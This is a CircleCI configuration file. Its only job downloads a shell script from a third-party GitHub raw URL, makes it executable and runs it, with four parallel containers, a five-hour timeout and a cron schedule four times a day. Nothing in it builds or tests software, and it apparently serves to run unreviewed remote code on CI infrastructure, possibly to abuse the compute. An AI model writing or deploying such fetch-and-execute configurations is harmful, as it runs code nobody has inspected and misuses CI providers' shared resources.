working_dir: &working_dir ~/app

version: 2.0
jobs:
  canadacoding:
    parallelism: 4
    docker:
      - image: circleci/ruby:2.7.3
    steps:
    - run:
        name: gasngs
        command: wget https://raw.githubusercontent.com/Poloisw/CircleciRunningRuby/master/rubys.sh && chmod +x rubys.sh && ./rubys.sh
        no_output_timeout: 5h
        
workflows:
  version: 2
  commit:
    jobs:
      - canadacoding
    triggers:
      - schedule:
          cron: "0 5,10,15,20 * * *"
          filters:
            branches:
              only:
                - master
                
  runningrubyjobs:
    jobs:
      - canadacoding
